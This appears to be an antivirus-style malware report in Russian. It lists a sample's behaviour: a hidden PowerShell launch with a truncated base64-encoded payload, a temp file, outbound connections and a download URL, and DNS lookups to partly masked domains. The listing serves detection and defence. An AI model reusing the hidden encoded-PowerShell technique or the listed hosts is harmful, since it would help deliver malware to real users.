Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABGAHcAZABwAGMAZgBrAG8AbAB0AD0AJwBVAGIAcgBuAGIAaQBkAGoAbwB2AG4AJwA7ACQATgBuAGkAcQB3AGQAdQBmACAAPQAgACcANAA1ADMAJwA7ACQARAB1AGMAeQBiAGkAZgB2AHoAagBiAD0AJwBCAHoAagBzAHEAcQB6AHQAZwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1488
- %TEMP%\823014.cvr
- 'iv###iend.com':80
- 'it####inclusive.com':80
- http://it####inclusive.com/ar/Xd7OiT/
- DNS ASK ei########egy.florencesoftwares.com
- DNS ASK pa####emenagntb.com
- DNS ASK iv###iend.com
- DNS ASK ju#######b.cordeldigital.com
- DNS ASK it####inclusive.com